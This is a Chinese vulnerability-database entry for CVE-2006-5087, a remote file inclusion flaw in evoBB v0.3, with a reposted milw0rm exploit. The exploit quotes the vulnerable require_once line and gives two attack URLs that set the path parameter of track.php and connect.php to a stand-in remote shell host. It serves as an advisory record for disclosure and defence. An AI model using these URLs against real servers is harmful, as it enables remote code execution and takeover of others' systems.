evoBB 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111133 漏洞类型 输入验证
发布时间 2006-09-25 更新时间 2006-10-09
CVE编号 CVE-2006-5087 CNNVD-ID CNNVD-200609-548
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2431
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-548
|漏洞详情
evoBB中存在多个PHP远程文件包含漏洞。远程攻击者可以通过(1)track.php或(2)connect.php的path参数中的URL,执行任意PHP代码。
|漏洞EXP
#==============================================================================================
#evoBB <= v0.3 (path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.4yougratis.it/script_php/forum/evoBBv0.3.htm     
#                                                                      
#Version : v0.3                                            
#                                                        
#================================================================================================
#Bug in : track.php
#
#Vlu Code :
#--------------------------------
#
#        require_once($path.'connect.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/track.php?path=http://SHELLURL.COM
#http://sitename.com/[Script Path]/connect.php?path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]
|参考资料

来源:XF
名称:evobb-path-file-include(29145)
链接:http://xforce.iss.net/xforce/xfdb/29145
来源:BID
名称:20189
链接:http://www.securityfocus.com/bid/20189
来源:MILW0RM
名称:2431
链接:http://www.milw0rm.com/exploits/2431
来源:MILW0RM
名称:2431
链接:http://milw0rm.com/exploits/2431